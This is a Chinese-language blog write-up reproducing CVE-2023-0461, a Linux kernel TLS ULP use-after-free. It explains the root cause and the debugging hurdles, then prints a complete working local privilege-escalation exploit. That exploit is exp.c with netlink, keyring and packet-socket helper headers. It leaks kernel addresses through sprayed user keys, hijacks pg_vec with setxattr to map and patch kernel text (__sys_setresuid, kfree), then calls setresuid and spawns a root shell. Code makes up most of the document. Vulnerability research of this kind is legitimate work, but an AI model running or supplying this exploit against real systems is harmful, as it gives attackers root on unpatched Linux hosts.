CVE-2023-0461


环境搭建

commit:2c85ebc57b3e1817b6ce1a6b703928e113a90442

总的config:

defconfig+menuconfig

CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
CONFIG_NET_SCHED=y
CONFIG_DEBUG_INFO=y
CONFIG_USER_NS=y #支持新的namespace
CONFIG_USERFAULTFD=y #支持userfaultfd
CONFIG_TLS=y #漏洞触发必要选项
CONFIG_XFRM_ESPINTCP=y #漏洞触发必要选项,二者选其一

(同样是修改了objtool的一个代码)

漏洞原理

Linux 内核在处理 icsk->icsk_ulp_data 指针时存在错误导致 UAF,

源代码:

https://elixir.bootlin.com/linux/v5.10/source/net/ipv4/tcp_ulp.c#L150

主要的tcp_*_ulp函数

如果 socket 设置 ulp 后进入 listen 状态,然后有其他 socket 发起 connect 系统调用请求连接,新创建的 sk 对象会拷贝 icsk->icsk_ulp_data 指针,相关代码位于 sk_clone_lock 函数

根据 tcp_prot 的定义,在 sock_copy 通过 memcpy 拷贝 sk->sk_dontcopy_end 后面的成员时就会拷贝 icsk->icsk_ulp_data ,==漏洞的关键点是对象指针拷贝后没有使用引用计数管理,释放其中一个指针就会导致悬垂指针的产生==。

accept

也就是说,在服务端,建立一个套接字并bind、listen,最后accept,服务端是知道自己的套接字描述符的,然后客户端也简历一个套接字,通过connect连接服务端,但是此时服务端是不知道对面的套接字描述符的,或者说没有用,因为对面的套接字的文件描述符只是客户端进程的,对服务端进程来说没有意义,所以服务端要通过accept生成一个新的套接字,通过这个套接字代表CS之间的连接。

漏洞触发

connect连接不上的问题

对照GitHub上的脚本复现,发现要想成功连接,需要创建一个namespace,同时还需要使用配置相关网络接口,这里使用GitHub中给出的net_if函数以及netlink_utils.h头文件进行配置:

#include "netlink_utils.h"

#define ADD_LINK RTM_NEWLINK
#define DEL_LINK RTM_DELLINK
#define FLUSH RTM_GETLINK
#define ADD_ADDR RTM_NEWADDR
#define DEL_ADDR RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_NET_INTERFACES 0x1800

int net_if(int action, char *type, int n, int opt, bool change) {

struct nlmsghdr *msg;
struct nlattr *opts;
struct ifinfomsg ifinfo = {};
struct ifaddrmsg ifaddr = {};
char name[0x100] = { 0 };
int sk;

strcpy(name, type);

if (n >= 0)
snprintf(name, sizeof(name), "%s-%d", type, n);

// Initalize a netlink socket and allocate a nlmsghdr
sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
if (!sk) {
perror("nl_init_request()");
return -1;
}

switch (action) {
case ADD_LINK:
case DEL_LINK:

ifinfo.ifi_family = AF_UNSPEC;
ifinfo.ifi_type = PF_NETROM;
ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
ifinfo.ifi_flags = opt;
ifinfo.ifi_change = change ? 1 : 0;

nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

if (action == ADD_LINK) {
// Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
// (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
// This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
nla_put_u32(msg, IFLA_MTU, 1000);
nla_put_string(msg, IFLA_IFNAME, name);
opts = nla_nest_start(msg, IFLA_LINKINFO);
nla_put_string(msg, IFLA_INFO_KIND, type);
nla_nest_end(msg, opts);
}

break;

case ADD_ADDR:
case DEL_ADDR:

ifaddr.ifa_family = AF_INET;
ifaddr.ifa_prefixlen = 16;
ifaddr.ifa_flags = 0;
ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
ifaddr.ifa_index = if_nametoindex(name);

nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

break;
}
// Send the netlink message and deallocate resources
return nl_complete_request(sk, msg);
}

int setup_sandbox(void)
{
if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
return -1;
}
net_if(ADD_LINK, "lo", -1, IFF_UP, true);
return 0;
}

int main(void)
{
setup_sandbox();

}

具体的解释看gpt所述:

设置ULP失败原因探究

所以就是先建立一个连接,然后才能给client设置ULP;

之后要将这个client connect一个地址(但是并没有创建套接字),之后才能给client绑定一个地址;

然后创建一个新的套接字去连接这个client,然后client accept,返回的文件描述符和client拥有相同的ULP;

RCU宽限期

对于我们的ulp_data,可能我们虽然close了,但是由于RCU宽限期的原因,可能要等一段时间之后才能真的释放obj;

这个UAF洞的利用很巧妙,close之后会有一些列操作,如果此时的obj已经被我们覆盖了,那么很可能会出错,但是如果是正常的就不会错,然后到了kfree之前会有这个RCU宽限期,在这个宽限期我们UAF写,然后kfree,就没错。

mmap失败原因

笔者得到的错误:

Invalid argument;

这是在笔者使用setxattr修改了gp_vec之后就会发生这个报错,但是如果不进行修改,就不会发生这个错误;笔者考虑到了可能是笔者写多了的缘故,但是笔者将64个地址改成了33个地址还是出错了;

经过调试发现mmap之前并没有因为setxattr释放了的缘故而导致地址发生改变

发生了空指针解引用;

手动set一个地址:

可以看到成功了;

最终找到了解决方案:利用前面读内核密钥泄露的上一个pg_vec的指针,作为setxattr的内容去写新的pg_vec,然后只修改它的第一个指针为我们的目标地址即可;

目前来看推测page_offset_base,只能先保留高32位,然后逐步-0x100000000来命中了,这个很不稳定;

成功leak!

page_offset_base

patch 内核

教程:

https://tttang.com/archive/1706/

一定要搜函数__sys_setresuid,笔者就是漏了前面的两个下划线,找了半天。。。

这个跳转要干掉:

后边还有个问题就是内存被破坏了,system起不来,经过调试发现是在kfree崩了,具体原因不详,因此笔者索性就用USMA把kfree函数的第一个字节patch成0xc3,直接退出好了;

LEAK

似乎内核密钥被释放掉之后会有内核地址被写入,这个笔者之前学过,没复现成功,没想到在这里给解决了。

这里相当于是那个滞后的free给我们把内核密钥释放了,然后反而帮我们泄露了内核地址了;

内核密钥被释放之后会得到如下内存布局,此后如果能够通过UAF读出来的第一个64位内容就是一个内核代码段地址;(笔者的内核密钥是被一个ulp结构体给释放的,竟然也会有这个字段)

调试

gdb -ex "target remote localhost:1234" -ex "file /mnt/hgfs/VMshare2/cve/v5.10.0/CVE-2023-0461/vmlinux" -ex "c"
p ((struct inet_connection_sock *) osk)->icsk_ulp_data
b user_preparse

bullseye.img适配

首先是RCU宽限期的等待时间需要稍微改正,然后就是这次笔者将pg_veg中依次写入达大量内核代码段地址之后mmap成功,最终实现提权:

demo

攻击成功

FINAL-EXP

exp.c


#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/tls.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>

#include "netlink_utils.h"

#define ADD_LINK RTM_NEWLINK
#define DEL_LINK RTM_DELLINK
#define FLUSH RTM_GETLINK
#define ADD_ADDR RTM_NEWADDR
#define DEL_ADDR RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_NET_INTERFACES 0x1800

int tls1, tls2, tls3, tls4;

int net_if(int action, char *type, int n, int opt, bool change);

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
//CPU绑核
void bindCore(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

int setup_sandbox(void)
{
if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
return -1;
}
net_if(ADD_LINK, "lo", -1, IFF_UP, true);

char edit[0x200];
int tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
return 0;
}


int net_if(int action, char *type, int n, int opt, bool change) {

struct nlmsghdr *msg;
struct nlattr *opts;
struct ifinfomsg ifinfo = {};
struct ifaddrmsg ifaddr = {};
char name[0x100] = { 0 };
int sk;

strcpy(name, type);

if (n >= 0)
snprintf(name, sizeof(name), "%s-%d", type, n);

// Initalize a netlink socket and allocate a nlmsghdr
sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
if (!sk) {
perror("nl_init_request()");
return -1;
}

switch (action) {
case ADD_LINK:
case DEL_LINK:

ifinfo.ifi_family = AF_UNSPEC;
ifinfo.ifi_type = PF_NETROM;
ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
ifinfo.ifi_flags = opt;
ifinfo.ifi_change = change ? 1 : 0;

nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

if (action == ADD_LINK) {
// Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
// (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
// This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
nla_put_u32(msg, IFLA_MTU, 1000);
nla_put_string(msg, IFLA_IFNAME, name);
opts = nla_nest_start(msg, IFLA_LINKINFO);
nla_put_string(msg, IFLA_INFO_KIND, type);
nla_nest_end(msg, opts);
}

break;

case ADD_ADDR:
case DEL_ADDR:

ifaddr.ifa_family = AF_INET;
ifaddr.ifa_prefixlen = 16;
ifaddr.ifa_flags = 0;
ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
ifaddr.ifa_index = if_nametoindex(name);

nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

break;
}
// Send the netlink message and deallocate resources
return nl_complete_request(sk, msg);
}

int tls1, tls2;
int set_ulp(int port){
struct sockaddr_in addr;
socklen_t len = sizeof(addr);
int tls, s, s2;

tls = socket(AF_INET, SOCK_STREAM, 0);
s = socket(AF_INET, SOCK_STREAM, 0);

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);

// Put the socket into ESTABLISHED state
if(bind(s, &addr, sizeof(addr)) < 0){
perror("bind");
exit(-1);
}

if(listen(s, 0) < 0){
perror("listen");
exit(-1);
}

if(connect(tls, &addr, sizeof(addr)) < 0){
perror("connect");
exit(-1);
}

// Initialize TLS ULP
if(setsockopt(tls, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0){
perror("set ulp");
}

return tls;
}

int clone_tls(int tls, int port){
struct sockaddr_in addr;
socklen_t len = sizeof(addr);
int s, new;

s = socket(AF_INET, SOCK_STREAM, 0);


// Disconnect the input socket `sk`
addr.sin_family = AF_UNSPEC;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);

connect(tls, &addr, sizeof(addr)); //为什么要先连接一下才能bind?

// Listen on `sk` (This should not happen!)
addr.sin_family = AF_INET;
if(bind(tls, &addr, sizeof(addr)) < 0){
perror("bind2");
exit(-1);
}
if(listen(tls, 0) < 0){
perror("listen2");
exit(-1);
}
if(connect(s, &addr, sizeof(addr)) < 0 ){
perror("connect2");
exit(-1);
}

// Clone icsk_ulp_data
new = accept(tls, &addr, &len);

// Now the input socket `sk` and `new`
// share the same icsk_ulp_data pointer
return new;
}

#include "key.h"
#define TOTAL_KEYS 60
int kids[TOTAL_KEYS];
void spray_key(int times, int len){
char des[0x100];
memset(des, 0, sizeof(des));
char pay[0x200];
memset(pay, 0, sizeof(pay));
for(int i = 0; i < TOTAL_KEYS && i < times; i++){
memset(des, 'A'+i, 0x80);
memset(pay, 'a'+i, len);
kids[i] = key_alloc(des, pay, len);
printf("kid_%d == %d\n", i, kids[i]);
}
}

#include <sys/types.h>
#include <sys/xattr.h>

void spray_attr(int times, int size){
const char *path = "/path/to/file";
const char *name = "user.attribute";
const char *value = "value";
int flags = 0; // 可以是 XATTR_CREATE 或 XATTR_REPLACE

for(int i = 0; i < times; i++){
setxattr(path, name, value, size, flags);
}
}

size_t data[0x20000];
int pipe_kernel[2];

#include "pg_vec.h"
void child(){
size_t kernel_offset_base;
unshare_setup();
puts("here child");
char cmd[4];
read(pipe_kernel[0], &kernel_offset_base, 8);
puts("end2");

}
int get_one_key(char des_chr, char pay_chr, int len){
char des[0x100];
memset(des, 0, sizeof(des));
memset(des, des_chr, 0x80);
char pay[0x400];
memset(pay, 0, sizeof(pay));
memset(pay, pay_chr, len);
return key_alloc(des, pay, len);
}
size_t data2[0x10000];
#define print_init_cred() \
printf("%p\n", init_cred); \
puts("hello")

#define mov_rdi_init_cred(con) \
memcpy(con, "\x48\xbf", 2);\
memcpy(con+2, &init_cred)


size_t ker_base[0x20000];
int main(void)
{
size_t kernel_offset_base;
bindCore(0);
save_status();
unshare_setup();
net_if(ADD_LINK, "lo", -1, IFF_UP, true);

tls1 = set_ulp(1111);
tls2 = clone_tls(tls1, 1112);
printf("tls1 == %d, tls2 == %d\n", tls1, tls2);

tls3 = set_ulp(1113);
tls4 = clone_tls(tls3, 1114);
printf("tls3 == %d, tls4 == %d\n", tls3, tls4);

close(tls1);
puts("sleeping ... ");
sleep(3);
close(tls2);
puts("sleeping ... ");
sleep(3);
spray_key(1, 0x100);
size_t data[0x1000];
puts("spray key done");
getchar();


int key_len = key_read(kids[0], ker_base, 0x20000);
ker_base[0] -= 0xffffffff820464c0;

int pfd = pagealloc_pad(33, 0x1000);
printf("pfd == %d\n", pfd);

key_len = key_read(kids[0], data, 0x20000);
printf("key_len == %d\n", key_len);
for(int i = 0; i < 0x100; i++){
if(data[i] >= 0xffff888000000000 && data[i] <= 0xfffffff000000000){
printf("data -> %p\n", (void *)data[i]);
kernel_offset_base = data[i] & 0xfffffff000000000;
break;
}

}
printf("kernel_offset_base == %p\n", (void *)kernel_offset_base);
getchar();

close(tls3);
puts("sleeping ... ");
sleep(3);
close(tls4);
puts("sleeping ... ");
sleep(3);

pfd = pagealloc_pad(33, 0x1000);
printf("pfd == %d\n", pfd);

for(int i = 0; i < 34; i++){
printf("data-> %p\n", (void *)data[i]);
}

for(int i = 0; i < 3; i++){
data2[i] = data[i] + 0x3000;
}
memcpy(data2+3, data, 30*8);
data2[0] = kernel_offset_base;

const char *path = "/test";
const char *name = "user.attribute";
const char *value = data2;
size_t size = 0x200;
int flags = 0; // 可以是 XATTR_CREATE 或 XATTR_REPLACE

puts("before setxattr");
getchar();

int result ;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}

puts("before mmap");
//getchar();
size_t *page = 0LL;
//if (page == MAP_FAILED) {
//perror("mmap");
//exit(-1);
//}
printf("page == %p\n", (void *)page);

data2[0] += 0x9d000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
printf("page == %p\n", (void *)page);

size_t kbase = 0xffffffff81000040;
printf("kbase == %p\n", (void *)kbase);
size_t init_cred = ker_base[0] + 0xffffffff8244c6c0;

//================================================== patch kernel ============================================================
data2[0] = ker_base[0] + 0xffffffff8107a000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
page = mmap(NULL, 0x1000*33, PROT_READ|PROT_WRITE, MAP_SHARED, pfd, 0); //mmap的size要和addr对齐
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
char *p = (char *)page;
printf("page == %p\n", (void *)page);
memset(p+0xace, 0x90, 6);
memset(p+0xad7, 0x90, 2);
memset(p+0xade, 0x90, 6);
memset(p+0xae8, 0x90, 2);
memset(p+0xaee, 0x90, 6);

memset(p+0xbbb, 0x90, 2);
memcpy(p+0xbbd, "\x48\xbf", 2);
memcpy(p+0xbbd+2, &init_cred, 8);



//=============================================== patch kfree ===========================================================
data2[0] = ker_base[0] + 0xffffffff811d4000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
page = mmap(NULL, 0x1000*33, PROT_READ|PROT_WRITE, MAP_SHARED, pfd, 0); //mmap的size要和addr对齐
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
p = page;
memset(p+0x200, 0xc3, 2);
//===========================================================================================================================

int end_pfd = pagealloc_pad(33, 0x1000);
printf("end_pfd == %d\n", end_pfd);

setresuid(0, 0, 0);
system("/bin/sh");

while(1){
;
}



}
/*
* Utils used to communicate with the kernel via Netlink.
* Useful for static linking.
*/

#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/pkt_sched.h>

#define PAGE_SIZE 0x1000
#define NL_AUTO_SEQ 0
#define NL_AUTO_PID 0

void *nlmsg_tail(const struct nlmsghdr *msg)
{
return (unsigned char *)msg + NLMSG_ALIGN(msg->nlmsg_len);
}

void *nlmsg_data(const struct nlmsghdr *msg)
{
return NLMSG_DATA(msg);
}

int nlmsg_datalen(const struct nlmsghdr *msg)
{
return msg->nlmsg_len - NLMSG_HDRLEN;
}

struct nlmsghdr *nlmsg_alloc(void)
{
struct nlmsghdr *msg;

msg = calloc(1, 0x1000);
if (!msg)
return NULL;

msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0));
return msg;
}

struct nlmsghdr *nlmsg_init(int type, int flags)
{
struct nlmsghdr *msg;

msg = nlmsg_alloc();
if (!msg)
return NULL;

msg->nlmsg_type = type;
msg->nlmsg_flags = flags;
msg->nlmsg_seq = NL_AUTO_SEQ;
msg->nlmsg_pid = NL_AUTO_PID;

return msg;
}

void nlmsg_free(struct nlmsghdr *msg)
{
free(msg);
}

int nl_init_request(int type, struct nlmsghdr **msg, int flags)
{
int sk;
struct nlmsghdr *n;

sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
if (sk < 0)
return -1;

n = nlmsg_init(type, flags);
if (!n) {
close(sk);
return -1;
}

*msg = n;
return sk;
}

void *nlmsg_reserve(struct nlmsghdr *msg, size_t len, int pad)
{
char *data = (char *)msg;
size_t tlen;

tlen = NLMSG_ALIGN(len);
data += msg->nlmsg_len;
msg->nlmsg_len += tlen;

if (tlen > len)
memset(data + len, 0, tlen - len);

return data;
}

int nlmsg_append(struct nlmsghdr *msg, void *data, size_t len, int pad)
{
void *tmp;

tmp = nlmsg_reserve(msg, len, pad);
if (tmp == NULL)
return -1;

memcpy(tmp, data, len);
return 0;
}

int nl_sendmsg(int sk, struct nlmsghdr *msg)
{
struct iovec iov = {};
struct msghdr hdr = {};

if (sk < 0)
return -1;

iov.iov_base = (void *)msg;
/*
* Here add NLMSG_GOODSIZE (0xec0) to the total message length
* to be sure the msg in netlink_alloc_large_skb() is allocated using vmalloc():
* https://elixir.bootlin.com/linux/v6.1/source/net/netlink/af_netlink.c#L1190
* Useful to reduce noise in kmalloc-512 slabs.
*/
iov.iov_len = msg->nlmsg_len + 0xec0;

hdr.msg_name = NULL;
hdr.msg_namelen = sizeof(struct sockaddr_nl);
hdr.msg_iov = &iov;
hdr.msg_iovlen = 1;

return sendmsg(sk, &hdr, 0);
}

int nl_complete_request(int sock, struct nlmsghdr *msg)
{
int ret;

ret = nl_sendmsg(sock, msg);
nlmsg_free(msg);
close(sock);

return ret;
}

void *nla_data(const struct nlattr *nla)
{
return (char *)nla + NLA_HDRLEN;
}

int nla_attr_size(int payload)
{
return NLA_HDRLEN + payload;
}

int nla_total_size(int payload)
{
return NLA_ALIGN(nla_attr_size(payload));
}

int nla_padlen(int payload)
{
return nla_total_size(payload) - nla_attr_size(payload);
}

struct nlattr *nla_reserve(struct nlmsghdr *msg, int attrtype, int attrlen)
{
struct nlattr *nla;

nla = (struct nlattr *)nlmsg_tail(msg);
nla->nla_type = attrtype;
nla->nla_len = nla_attr_size(attrlen);

memset((unsigned char *) nla + nla->nla_len, 0, nla_padlen(attrlen));

msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + nla_total_size(attrlen);
return nla;
}

int nla_put(struct nlmsghdr *msg, int attrtype, int datalen, const void *data)
{
struct nlattr *nla;

nla = nla_reserve(msg, attrtype, datalen);
if (!nla)
return -1;

memcpy(nla_data(nla), data, datalen);
return 0;
}

int nla_put_u32(struct nlmsghdr *msg, int attrtype, uint32_t value)
{
return nla_put(msg, attrtype, sizeof(uint32_t), &value);
}

int nla_put_string(struct nlmsghdr *msg, int attrtype, const char *str)
{
return nla_put(msg, attrtype, strlen(str) + 1, str);
}

int nla_put_nested(struct nlmsghdr *msg, int attrtype, const struct nlmsghdr *nested)
{
return nla_put(msg, attrtype, nlmsg_datalen(nested), nlmsg_data(nested));
}

struct nlattr *nla_nest_start(struct nlmsghdr *msg, int attrtype)
{
struct nlattr *start = (struct nlattr *)nlmsg_tail(msg);

if (nla_put(msg, NLA_F_NESTED | attrtype, 0, NULL) < 0)
return NULL;

return start;
}

int nla_nest_end(struct nlmsghdr *msg, struct nlattr *start)
{
size_t pad, len;

len = (char *)nlmsg_tail(msg) - (char *)start;
start->nla_len = len;

pad = NLMSG_ALIGN(msg->nlmsg_len) - msg->nlmsg_len;
if (pad > 0) {
if (!nlmsg_reserve(msg, pad, 0))
return -1;
}
return 0;
}

key.h

#include <linux/keyctl.h>
#include <sys/syscall.h>
#include <unistd.h>

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specifi*/
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's cont*/

int key_alloc(char *description, char *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, char *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, char *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}



pg_vec.h

#include <sys/mman.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/if_ether.h>

void err_exit(char *s){
perror(s);
exit(-1);
}
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

if(unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
err_exit("FAILED to create a new namespace");

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}


void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) puts("setsockopt(PACKET_VERSION)"), exit(-1);

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) puts("setsockopt(PACKET_RX_RING)"), exit(-1);
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) puts("socket(AF_PACKET)"), exit(-1);

packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) puts("bind(AF_PACKET)"), exit(-1);

return s;
}
// count 为 pg_vec 数组的大小, 即 pg_vec 的大小为 count*8
// size/4096 为要分配的 order
int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}


注意点总结

  1. 要创建namespace和激活端口才能正确进行connect;

  2. ULP的设置要在建立连接之后;

  3. 新地址的绑定还要先connect一下?

  4. RCU宽限期


文章作者: q1ming
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
  目录